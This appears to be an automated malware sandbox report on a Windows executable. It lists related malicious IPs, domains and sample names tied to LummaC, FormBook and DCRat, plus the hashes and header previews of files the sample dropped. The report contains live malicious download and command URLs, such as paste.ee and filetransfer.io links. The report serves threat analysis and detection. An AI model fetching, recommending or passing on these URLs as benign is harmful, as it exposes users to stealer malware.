                                                                                                  Cookbook Comments:
                                                                                                  • Found application associated with file extension: .exe
                                                                                                  • Override analysis time to 240s for sample files taking high CPU consumption
                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                  • Excluded IPs from analysis (whitelisted): 4.175.87.197, 20.3.187.198, 13.85.23.206, 13.107.246.45
                                                                                                  • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                                  • Execution Graph export aborted for target ColorStreamLib.exe, PID 3940 because there are no executed function
                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                  TimeTypeDescription
                                                                                                  10:53:56API Interceptor8x Sleep call for process: qnUFsmyxMm.exe modified
                                                                                                  10:55:00API Interceptor1x Sleep call for process: ColorStreamLib.exe modified
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  188.114.97.3RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.rgenerousrs.store/o362/
                                                                                                  A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.beylikduzu616161.xyz/2nga/
                                                                                                  Delivery_Notification_00000260791.doc.jsGet hashmaliciousUnknownBrowse
                                                                                                  • radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
                                                                                                  ce.vbsGet hashmaliciousUnknownBrowse
                                                                                                  • paste.ee/d/lxvbq
                                                                                                  Label_00000852555.doc.jsGet hashmaliciousUnknownBrowse
                                                                                                  • tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
                                                                                                  PO 20495088.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.ssrnoremt-rise.sbs/3jsc/
                                                                                                  QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                  • filetransfer.io/data-package/zWkbOqX7/download
                                                                                                  http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                                                                  • kklk16.bsyo45ksda.top/favicon.ico
                                                                                                  gusetup.exeGet hashmaliciousUnknownBrowse
                                                                                                  • www.glarysoft.com/update/glary-utilities/pro/pro50/
                                                                                                  Online Interview Scheduling Form.lnkGet hashmaliciousDucktailBrowse
                                                                                                  • gmtagency.online/api/check
                                                                                                  172.67.219.133Purchase Order.xlsGet hashmaliciousFormBookBrowse
                                                                                                  • paste.ee/r/r87uc
                                                                                                  Purchase Order.xlsGet hashmaliciousUnknownBrowse
                                                                                                  • paste.ee/r/r87uc
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  klipjarifaa.shopFloydMounts.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  • 104.21.74.235
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  CLOUDFLARENETUSGz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 172.67.157.254
                                                                                                  yTcaknrrb8.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.92.91
                                                                                                  Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  • 172.67.198.102
                                                                                                  eP6sjvTqJa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                  • 104.21.38.84
                                                                                                  GqjiKlwarV.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                  • 172.67.220.198
                                                                                                  1znAXdPcM5.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                  • 104.21.38.84
                                                                                                  YGk3y6Tdix.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                  • 104.21.38.84
                                                                                                  https://mmm.askfollow.us/#CRDGet hashmaliciousUnknownBrowse
                                                                                                  • 104.17.24.14
                                                                                                  http://l.instagram.com/?0bfd7a413579bfc47b11c1f19890162e=f171d759fb3a033e4eb430517cad3aef&e=ATP3gbWvTZYJbEDeh7rUkhPx4FjctqZcqx8JLHQOt3eCFNBI8ssZ853B2RmMWetLJ63KaZJU&s=1&u=https%3A%2F%2Fbusiness.instagram.com%2Fmicro_site%2Furl%2F%3Fevent_type%3Dclick%26site%3Digb%26destination%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fig_redirect%252F%253Fd%253DAd8U5WMN2AM7K-NrvRBs3gyfr9DHeZ3ist33ENX9eJBJWMRBAaOOij4rbjtu42P4dXhL8YyD-jl0LZtS1wkFu-DRtZrPI1zyuzAYXXYv3uJfsc2GuuhHJZr0iVcLluY7-XzYStW8tPCtY7q5OaN0ZR5NezqONJHNCe212u1Fk3V5I6c8mMsj53lfF9nQIFCpMtE%2526a%253D1%2526hash%253DAd_y5usHyEC86F8XGet hashmaliciousUnknownBrowse
                                                                                                  • 104.26.13.60
                                                                                                  https://t.co/YjyGioQuKTGet hashmaliciousUnknownBrowse
                                                                                                  • 104.21.64.1
                                                                                                  CLOUDFLARENETUSGz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 172.67.157.254
                                                                                                  yTcaknrrb8.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.92.91
                                                                                                  Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  • 172.67.198.102
                                                                                                  eP6sjvTqJa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                  • 104.21.38.84
                                                                                                  GqjiKlwarV.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                  • 172.67.220.198
                                                                                                  1znAXdPcM5.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                  • 104.21.38.84
                                                                                                  YGk3y6Tdix.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                  • 104.21.38.84
                                                                                                  https://mmm.askfollow.us/#CRDGet hashmaliciousUnknownBrowse
                                                                                                  • 104.17.24.14
                                                                                                  http://l.instagram.com/?0bfd7a413579bfc47b11c1f19890162e=f171d759fb3a033e4eb430517cad3aef&e=ATP3gbWvTZYJbEDeh7rUkhPx4FjctqZcqx8JLHQOt3eCFNBI8ssZ853B2RmMWetLJ63KaZJU&s=1&u=https%3A%2F%2Fbusiness.instagram.com%2Fmicro_site%2Furl%2F%3Fevent_type%3Dclick%26site%3Digb%26destination%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fig_redirect%252F%253Fd%253DAd8U5WMN2AM7K-NrvRBs3gyfr9DHeZ3ist33ENX9eJBJWMRBAaOOij4rbjtu42P4dXhL8YyD-jl0LZtS1wkFu-DRtZrPI1zyuzAYXXYv3uJfsc2GuuhHJZr0iVcLluY7-XzYStW8tPCtY7q5OaN0ZR5NezqONJHNCe212u1Fk3V5I6c8mMsj53lfF9nQIFCpMtE%2526a%253D1%2526hash%253DAd_y5usHyEC86F8XGet hashmaliciousUnknownBrowse
                                                                                                  • 104.26.13.60
                                                                                                  https://t.co/YjyGioQuKTGet hashmaliciousUnknownBrowse
                                                                                                  • 104.21.64.1
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  a0e9f5d64349fb13191bc781f81f42e1Gz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 188.114.97.3
                                                                                                  • 172.67.219.133
                                                                                                  yTcaknrrb8.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 188.114.97.3
                                                                                                  • 172.67.219.133
                                                                                                  Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  • 188.114.97.3
                                                                                                  • 172.67.219.133
                                                                                                  Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 188.114.97.3
                                                                                                  • 172.67.219.133
                                                                                                  Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 188.114.97.3
                                                                                                  • 172.67.219.133
                                                                                                  PASS-1234.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 188.114.97.3
                                                                                                  • 172.67.219.133
                                                                                                  Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 188.114.97.3
                                                                                                  • 172.67.219.133
                                                                                                  Launcher_x64.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 188.114.97.3
                                                                                                  • 172.67.219.133
                                                                                                  Solara-Roblox-Executor-v3.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 188.114.97.3
                                                                                                  • 172.67.219.133
                                                                                                  Delta.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 188.114.97.3
                                                                                                  • 172.67.219.133
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpActive_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                    setup.exeGet hashmaliciousLummaCBrowse
                                                                                                      Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                        #Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                          installer_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                                            @Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                              MdhO83N5Fm.exeGet hashmaliciousLummaCBrowse
                                                                                                                C:\Users\user\AppData\Local\Temp\is-66D10.tmp\_isetup\_isdecmp.dllActive_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                  setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                    Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                      #Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                        installer_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                                                          @Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                            MdhO83N5Fm.exeGet hashmaliciousLummaCBrowse
                                                                                                                              installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                  @Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    Process:C:\Users\user\Desktop\qnUFsmyxMm.exe
                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):8856972
                                                                                                                                    Entropy (8bit):7.960537715482043
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:196608:uMonEZW6LN5TiMukr1UfDokfbn0kQv7croDi:uMoEFLT9xr+fPnbc7c
                                                                                                                                    MD5:C89C55FE25372BFBF8B9264A647C144B
                                                                                                                                    SHA1:77D03F9F9FAFAFC4D2B57428C18BFD093563682F
                                                                                                                                    SHA-256:C46D6103201008B96B237E10F2C6CA6874E6C0BEB507FE21F497578127AE8857
                                                                                                                                    SHA-512:D60535F3A12CECA7D5339513EE087DB46B2E3A6FF35D1939A7D5518CD6F4B407D7F1065F63B2AB10D21B9C0893F6F979B0AF85A0C40A5B02E9054874FDF4E044
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 51%
                                                                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.................t...p....................@.......................................@......@...................p..q....P......................4..XG...........................................................R..\....`.......................text....V.......X.................. ..`.itext..d....p.......\.............. ..`.data...88.......:...x..............@....bss....Xr...............................idata.......P......................@....didata......`......................@....edata..q....p......................@..@.tls.....................................rdata..]...........................@..@.reloc..............................@..B.rsrc...............................@..@....................................@..@................
                                                                                                                                    Process:C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exe
                                                                                                                                    File Type:PNG image data, 4224 x 1945, 8-bit/color RGB, non-interlaced
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):6529034
                                                                                                                                    Entropy (8bit):7.998110907699163
                                                                                                                                    Encrypted:true
                                                                                                                                    SSDEEP:196608:aU36HXf37kuxSPNTPnI0rq2Szy9HlXGWYVkyjt:gHXf37D0Zq8HlXGWYVkyjt
                                                                                                                                    MD5:2F4D508A154A5A27F886AA2AB5321348
                                                                                                                                    SHA1:33520EAD7583D585C6FA7E62143F5FE405BF50AD
                                                                                                                                    SHA-256:70F3F8AC0761752733B13851CC45765D6E0EF53A330FC15B8E108B760F60C467
                                                                                                                                    SHA-512:0F1E892729058597578961097DE70B9888782B02689C98F16606FD383DCEC51F9DC6EB7F1D26D76914882CE3B7867052766EBF3AA2943A0C2E85D1440A748D0E
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:.PNG........IHDR..............._... .IDATx..;..G....+.U.{.. .....H.$..gm.i..;.+b...d.\.j.l..6..r..b.+..].|.5....?".*......3x....j._..=.?....W........pu..~..w..1..Z....n......8..A.4...#u].K.4MC.%....p..g....a..h...!...?.97w'/XJ..@CUU.R.#UU..K).R..RJ.{Y..K.u......]J..^..y.!.....R...,........b.I%.@7.&wW.1.]..\p\....2..u.......?..........{..@.48.<;4.w~.|.5....g....)....O.....`.....i].w..3..q...W....I........l.bh..r....+y...&..-..!.....a/.p...!.m..\.2../.I>c....R.3p...H.g_.#.f..;..s.M&..(...._..o..;...RJ)|......,..._p].....".........b.I..t.4u5\F.9.9..s....,._.....'.^.A...n...u...#..C........k..G..x)...!...(..c8..u. .g\.&.....d...?&..N....../GI>......rw.m1<$..}w..c..,l..n1*.s...o..8... ..q..^...\'.....~.16 .....o..xY.%..M..cx``.|..#5'..|.%.Y..%.e.M......./.d.Ob.RI\..,..,_)<%*....c8X...s...*.;...Lk]m;H.......8.~-vA.|....{..&^.......}H...0N..`.....N.'..t{\=$.............o.....@Q..A.$..K5.!...$g..a.-F...K-$;K.. .ij....`....~...5|`.o..
                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe
                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):3367424
                                                                                                                                    Entropy (8bit):6.530011244733973
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:98304:qJYVM+LtVt3P/KuG2ONG9iqLRQEd333T:7VL/tnHGYiql5l
                                                                                                                                    MD5:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                    SHA1:DC1C645533E0FD1637BF455BA69A9481E7C4B83A
                                                                                                                                    SHA-256:8D6E5513DE230109BE2238537173352832D1AEBDC7B10FAD0E59D4882812CA81
                                                                                                                                    SHA-512:C500B40B604AD6203396FCC0243CBB50EAD544586EAB2448C2C6BCC2106DFAE3777A85C344766224F5F695FA60295880623B2A97B0AAE97DC547076FA03CD067
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                    Joe Sandbox View:
                                                                                                                                    • Filename: Active_Setup.exe, Detection: malicious, Browse
                                                                                                                                    • Filename: setup.exe, Detection: malicious, Browse
                                                                                                                                    • Filename: Set-up.exe, Detection: malicious, Browse
                                                                                                                                    • Filename: #Setup.exe, Detection: malicious, Browse
                                                                                                                                    • Filename: installer_1.05_36.5.exe, Detection: malicious, Browse
                                                                                                                                    • Filename: @Setup.exe, Detection: malicious, Browse
                                                                                                                                    • Filename: MdhO83N5Fm.exe, Detection: malicious, Browse
                                                                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04.......3...@......@...................P,.n.....,.j:...P0.p.....................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc...p....P0......./.............@..@.............04......`3.............@..@................
                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp
                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):35616
                                                                                                                                    Entropy (8bit):6.953519176025623
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
                                                                                                                                    MD5:C6AE924AD02500284F7E4EFA11FA7CFC
                                                                                                                                    SHA1:2A7770B473B0A7DC9A331D017297FF5AF400FED8
                                                                                                                                    SHA-256:31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
                                                                                                                                    SHA-512:F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                    Joe Sandbox View:
                                                                                                                                    • Filename: Active_Setup.exe, Detection: malicious, Browse
                                                                                                                                    • Filename: setup.exe, Detection: malicious, Browse
                                                                                                                                    • Filename: Set-up.exe, Detection: malicious, Browse
                                                                                                                                    • Filename: #Setup.exe, Detection: malicious, Browse
                                                                                                                                    • Filename: installer_1.05_36.5.exe, Detection: malicious, Browse
                                                                                                                                    • Filename: @Setup.exe, Detection: malicious, Browse
                                                                                                                                    • Filename: MdhO83N5Fm.exe, Detection: malicious, Browse
                                                                                                                                    • Filename: installer_1.05_36.4.exe, Detection: malicious, Browse
                                                                                                                                    • Filename: !Setup.exe, Detection: malicious, Browse
                                                                                                                                    • Filename: @Setup.exe, Detection: malicious, Browse
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P......................................D=...............................P.......P..(....................L.. ?...p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp
                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):6144
                                                                                                                                    Entropy (8bit):4.720366600008286
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                    MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                    SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                    SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                    SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                    Malicious:false
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp
                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):35616
                                                                                                                                    Entropy (8bit):6.953519176025623
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
                                                                                                                                    MD5:C6AE924AD02500284F7E4EFA11FA7CFC
                                                                                                                                    SHA1:2A7770B473B0A7DC9A331D017297FF5AF400FED8
                                                                                                                                    SHA-256:31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
                                                                                                                                    SHA-512:F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P......................................D=...............................P.......P..(....................L.. ?...p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp
                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):6144
                                                                                                                                    Entropy (8bit):4.720366600008286
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                    MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                    SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                    SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                    SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                    Malicious:false
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe
                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):3367424
                                                                                                                                    Entropy (8bit):6.530011244733973
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:98304:qJYVM+LtVt3P/KuG2ONG9iqLRQEd333T:7VL/tnHGYiql5l
                                                                                                                                    MD5:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                    SHA1:DC1C645533E0FD1637BF455BA69A9481E7C4B83A
                                                                                                                                    SHA-256:8D6E5513DE230109BE2238537173352832D1AEBDC7B10FAD0E59D4882812CA81
                                                                                                                                    SHA-512:C500B40B604AD6203396FCC0243CBB50EAD544586EAB2448C2C6BCC2106DFAE3777A85C344766224F5F695FA60295880623B2A97B0AAE97DC547076FA03CD067
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04.......3...@......@...................P,.n.....,.j:...P0.p.....................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc...p....P0......./.............@..@.............04......`3.............@..@................
                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp
                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):846404211
                                                                                                                                    Entropy (8bit):0.14084982000793586
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:A42E953364198E087438838FD14040E7
                                                                                                                                    SHA1:14A8F937E6F683A68859EB5AA4B61C17048FC4D9
                                                                                                                                    SHA-256:5BD35BB6F3EE49884DB46F4E52E805BBEA8333C2627EAEEA8BC05785164CD576
                                                                                                                                    SHA-512:9A29901D832EA8B94A1C15BD9777F8E4DBA55A1198989EC73E4B4A87E17FBEB248220B8F35FD700285A7C9AD37C0B5616248A8248B3EE4076A5E085247228AC6
                                                                                                                                    Malicious:true
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"w.RC..RC..RC..I..`C..I...C..[;..UC..[;..IC..RC...B..I..NC..I..{C..I..SC..I..SC..RichRC..........................PE..L....NKO.....................Zi...................@...........................s.....T.s.......@...........................................f..........................................................................................................text...!........................... ..`.rdata...1.......2..................@..@.data...x........,..................@....rsrc.....f.......f.................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp
                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):846404211
                                                                                                                                    Entropy (8bit):0.14084982000793586
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:A42E953364198E087438838FD14040E7
                                                                                                                                    SHA1:14A8F937E6F683A68859EB5AA4B61C17048FC4D9
                                                                                                                                    SHA-256:5BD35BB6F3EE49884DB46F4E52E805BBEA8333C2627EAEEA8BC05785164CD576
                                                                                                                                    SHA-512:9A29901D832EA8B94A1C15BD9777F8E4DBA55A1198989EC73E4B4A87E17FBEB248220B8F35FD700285A7C9AD37C0B5616248A8248B3EE4076A5E085247228AC6
                                                                                                                                    Malicious:true
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"w.RC..RC..RC..I..`C..I...C..[;..UC..[;..IC..RC...B..I..NC..I..{C..I..SC..I..SC..RichRC..........................PE..L....NKO.....................Zi...................@...........................s.....T.s.......@...........................................f..........................................................................................................text...!........................... ..`.rdata...1.......2..................@..@.data...x........,..................@....rsrc.....f.......f.................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                    Entropy (8bit):5.990708045299052
                                                                                                                                    TrID:
                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                    File name:qnUFsmyxMm.exe
                                                                                                                                    File size:2'462'720 bytes
                                                                                                                                    MD5:a00f1411626bdf8860a00a2ee9f77709
                                                                                                                                    SHA1:cf1dca091b73e2c9fd8528a90cb66a68d7ddd744
                                                                                                                                    SHA256:39b753a793c07fe13d25dcb2e429cdadb40880fe3b86480a899f4898aaa2f1b6
                                                                                                                                    SHA512:1c38fc88948344d15e5c43f4a8eb31b55e7c29e072933046b0c469cb62485b84fa8ca5031e5602f4fbbf45f9c7e88c760b8c0884bd79464a7fe10a227778e0a6
                                                                                                                                    SSDEEP:49152:g1dMepjE16P8Q472L/nBNZvCece8T/OtLQ0e5iaPCVG9x3d9MnEbw8Q7G9QJ:IdMepjE16P8Q472jnBNZvCece8TGJQ02
                                                                                                                                    TLSH:97B5BE31A690C150FBB3A075A1A3529A967564F027CF74D3E3A423D9440BAECED31BB7
